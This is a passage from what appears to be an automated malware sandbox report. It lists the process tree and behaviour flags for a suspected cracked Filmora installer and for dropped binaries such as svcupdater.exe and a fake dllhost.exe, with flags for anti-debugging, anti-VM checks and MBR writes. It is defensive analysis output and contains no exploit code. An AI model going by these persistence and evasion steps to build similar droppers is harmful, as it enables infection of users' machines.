  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\Users\Admin\Desktop\PC_EXPERT-2023\File-Set-Up_PC.exe  (tree level 1)
  "C:\Users\Admin\Desktop\PC_EXPERT-2023\File-Set-Up_PC.exe"
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe  (tree level 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\browser_broker.exe  (tree level 1)
  C:\Windows\system32\browser_broker.exe -Embedding
  - Modifies Internet Explorer settings

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (tree level 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (tree level 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (tree level 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (tree level 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (tree level 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (tree level 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (tree level 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (tree level 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies registry class

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe  (tree level 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\browser_broker.exe  (tree level 1)
  C:\Windows\system32\browser_broker.exe -Embedding
  - NTFS ADS
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\filmora_setup_full846.exe  (tree level 2)
  "C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\filmora_setup_full846.exe"
  - Executes dropped EXE
  - Modifies Control Panel
  - Modifies Internet Explorer settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx

C:\Users\Public\Documents\Wondershare\NFWCHK.exe  (tree level 3)
  C:\Users\Public\Documents\Wondershare\NFWCHK.exe
  - Executes dropped EXE

C:\Users\Public\Documents\Wondershare\filmora_64bit_full846.exe  (tree level 3)
  "C:\Users\Public\Documents\Wondershare\filmora_64bit_full846.exe" /VERYSILENT /NOPAGE /LANG=ENG /LOG="C:\Users\Admin\AppData\Local\Temp\WAE-Wondershare Filmora.log" /installpath: "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\" /DIR="C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\" /WAEWIN=2036E
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

C:\Users\Admin\AppData\Local\Temp\is-9SPNL.tmp\filmora_64bit_full846.tmp  (tree level 4)
  "C:\Users\Admin\AppData\Local\Temp\is-9SPNL.tmp\filmora_64bit_full846.tmp" /SL5="$703BE,502339677,421888,C:\Users\Public\Documents\Wondershare\filmora_64bit_full846.exe" /VERYSILENT /NOPAGE /LANG=ENG /LOG="C:\Users\Admin\AppData\Local\Temp\WAE-Wondershare Filmora.log" /installpath: "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\" /DIR="C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\" /WAEWIN=2036E
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM Wondershare Filmora9.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM Wondershare Filmora X.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM Wondershare Filmora 11.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM Wondershare Filmora.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM EffectsInstaller.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM FCreatorAcademy.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM CheckGraphicsType.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM FilmoraExportEngine.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM ImageHost.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM FRecorder.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM Wondershare Screen Recorder.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM Filmora Core UX Service.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM Wondershare Filmora Update(x64).exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM FilmStockService.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM CreatorAcademy.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM ScreenRecorder.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM AlgorithmRunTest.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM AudioPlayer.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM bspatch.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM CefViewWing.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM cmdCheckATI.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM cmdCheckHEVC.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM coremediaserver.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM CrashReporter.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM DataReporting.exe
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM DownloadCenter.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM Filmora.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM FilmoraNPS.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM FilmoraPlayer.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM gpu_check.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM magic_xe_supported_detect.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM MessageService.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM ocl_check.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM ofx_check.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM perf_check.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM RenewService.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM senseTimeGlDetect.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM SupportService.exe
  - Kills process with taskkill

C:\Windows\SysWOW64\TASKKILL.exe  (tree level 5)
  "C:\Windows\system32\TASKKILL.exe" /F /IM WebBrowser.exe
  - Kills process with taskkill
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (tree level 5)
  "powershell.exe" [Environment]::GetFolderPath('MyDocuments') | Out-File "C:\Users\Public\Documents\B30281EA-BA02-4586-86F8-C9BE813884C1.txt" -Encoding UTF8

C:\Users\Admin\AppData\Local\Temp\is-17HHF.tmp\_isetup\_setup64.tmp  (tree level 5)
  helper 105 0x7C
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\regsvr32.exe  (tree level 5)
  "C:\Windows\system32\regsvr32.exe" /s atimpenc.dll

C:\Windows\system32\regsvr32.exe  (tree level 5)
  "C:\Windows\system32\regsvr32.exe" /s atixcode.dll

C:\Windows\system32\regsvr32.exe  (tree level 5)
  "C:\Windows\system32\regsvr32.exe" /s CFDecode64.ax

C:\Users\Admin\AppData\Local\Temp\is-17HHF.tmp\Wondershare Helper Compact.exe  (tree level 5)
  "C:\Users\Admin\AppData\Local\Temp\is-17HHF.tmp\Wondershare Helper Compact.exe" /VERYSILENT /SP-
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

C:\Users\Admin\AppData\Local\Temp\is-I8BJ8.tmp\Wondershare Helper Compact.tmp  (tree level 6)
  "C:\Users\Admin\AppData\Local\Temp\is-I8BJ8.tmp\Wondershare Helper Compact.tmp" /SL5="$30432,2101212,54272,C:\Users\Admin\AppData\Local\Temp\is-17HHF.tmp\Wondershare Helper Compact.exe" /VERYSILENT /SP-
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Drops file in Program Files directory
  - Suspicious use of SetWindowsHookEx

C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe  (tree level 7)
  "C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe" /regserver
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx

C:\Users\Admin\AppData\Local\Temp\is-17HHF.tmp\vcredist_x64.exe  (tree level 5)
  "C:\Users\Admin\AppData\Local\Temp\is-17HHF.tmp\vcredist_x64.exe" /q
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

\??\c:\aa8616e4e254b41bdd1a96\install.exe  (tree level 6)
  c:\aa8616e4e254b41bdd1a96\.\install.exe /q
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx

C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\Wondershare NativePush.exe  (tree level 5)
  "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\Wondershare NativePush.exe" /VERYSILENT /BINDINSTALL
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

C:\Users\Admin\AppData\Local\Temp\is-CNTR9.tmp\Wondershare NativePush.tmp  (tree level 6)
  "C:\Users\Admin\AppData\Local\Temp\is-CNTR9.tmp\Wondershare NativePush.tmp" /SL5="$40462,2940891,938496,C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\Wondershare NativePush.exe" /VERYSILENT /BINDINSTALL
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

C:\Users\Admin\AppData\Local\Temp\is-FNGCH.tmp\_isetup\_setup64.tmp  (tree level 7)
  helper 105 0x3E8
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx

C:\Windows\system32\netsh.exe  (tree level 7)
  "netsh.exe" advfirewall firewall add rule name="WsToastNotification" dir=in security=authnoencap action=allow program="C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsToastNotification.exe"
  - Modifies Windows Firewall

C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe  (tree level 7)
  "C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe" start
  - Executes dropped EXE

C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe  (tree level 7)
  "C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe" install
  - Executes dropped EXE

C:\Windows\SysWOW64\explorer.exe  (tree level 3)
  "C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\Wondershare Filmora Launcher.exe
C:\Program Files\Google\Chrome\Application\chrome.exe  (tree level 3)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" http://cbs.wondershare.com/go.php?m=ic&back_url=https%3A%2F%2Ffilmora.wondershare.com%2Fthankyou%2Finstall-filmora-video-editor.html%3Futm_source%3Dbutton%26utm_medium%3Dproduct-win&client_sign={c086e61f-2c18-4a3f-a2b1-1bf8de41e537G}&m_nProductID=846&installtime=1675125252&product_version=12.0.12.1450
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

C:\Program Files\Google\Chrome\Application\chrome.exe  (tree level 4)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xe8,0xec,0xf0,0xc4,0xf4,0x7ff9c4774f50,0x7ff9c4774f60,0x7ff9c4774f70

C:\Program Files\Google\Chrome\Application\chrome.exe  (tree level 4)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1940 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe  (tree level 4)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1560 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe  (tree level 4)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2440 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe  (tree level 4)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2432 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe  (tree level 4)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2424 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe  (tree level 4)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4216 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe  (tree level 4)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4344 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe  (tree level 4)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe  (tree level 4)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4720 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe  (tree level 4)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4520 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe  (tree level 4)
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1548,14392373515788521600,4346509287387515421,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2804 /prefetch:8
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (tree level 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe  (tree level 1)
  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies registry class

C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe  (tree level 1)
  C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe
  - Executes dropped EXE
  - Suspicious use of NtSetInformationThreadHideFromDebugger

C:\Windows\system32\taskmgr.exe  (tree level 1)
  "C:\Windows\system32\taskmgr.exe" /4
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\msiexec.exe  (tree level 1)
  C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Modifies registry class

C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe  (tree level 1)
  "C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe"
  - Executes dropped EXE

C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsToastNotification.exe  (tree level 2)
  "C:\Users\Admin\AppData\Local\Wondershare\Wondershare NativePush\WsToastNotification.exe"
  - Executes dropped EXE
  - Registers COM server for autorun
  - Loads dropped DLL
  - Modifies registry class

C:\ProgramData\Dllhost\dllhost.exe  (tree level 1)
  C:\ProgramData\Dllhost\dllhost.exe
  - Executes dropped EXE

C:\Windows\explorer.exe  (tree level 1)
  C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\Wondershare Filmora Launcher.exe  (tree level 2)
  "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\Wondershare Filmora Launcher.exe"
  - Executes dropped EXE

C:\Windows\explorer.exe  (tree level 3)
  "C:\Windows\explorer.exe" C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\Wondershare Filmora.exe

C:\Windows\explorer.exe  (tree level 1)
  C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\Wondershare Filmora.exe  (tree level 2)
  "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\Wondershare Filmora.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Checks whether UAC is enabled
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Checks processor information in registry
  - Suspicious behavior: AddClipboardFormatListener

C:\Windows\System32\Wbem\wmic.exe  (tree level 3)
  wmic diskdrive where index=1 get serialnumber

C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\AlgorithmRunTest.exe  (tree level 3)
  .\AlgorithmRunTest.exe ./ .\resources\ 0
  - Executes dropped EXE

C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\AlgorithmRunTest.exe  (tree level 3)
  .\AlgorithmRunTest.exe ./ .\resources\ 1

C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\magic_xe_supported_detect.exe  (tree level 3)
  .\magic_xe_supported_detect.exe 2 ./resources/wfx_effect/material/models/model_data.json wondershare

C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\FilmoraPlayer.exe  (tree level 3)
  "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\FilmoraPlayer.exe" check

C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\ocl_check.exe  (tree level 3)
  "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\ocl_check.exe" --blacklist "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\opencl_black_list.xml" --whitelist "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\opencl_white_list.xml" --gpu 0 --result "C:/Users/Admin/Documents\Wondershare/Wondershare Filmora\GPUConfig"\ --recheck 0

C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\ocl_check.exe  (tree level 3)
  "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\ocl_check.exe" --blacklist "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\opencl_black_list.xml" --whitelist "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\opencl_white_list.xml" --gpu 1 --result "C:/Users/Admin/Documents\Wondershare/Wondershare Filmora\GPUConfig"\ --recheck 0

C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\ocl_check.exe  (tree level 3)
  "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\ocl_check.exe" --blacklist "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\opencl_black_list.xml" --whitelist "C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\opencl_white_list.xml" --gpu 2 --result "C:/Users/Admin/Documents\Wondershare/Wondershare Filmora\GPUConfig"\ --recheck 0

C:\Users\Admin\AppData\Local\Wondershare\Wondershare Filmora\12.0.12.1450\DataReporting.exe  (tree level 3)
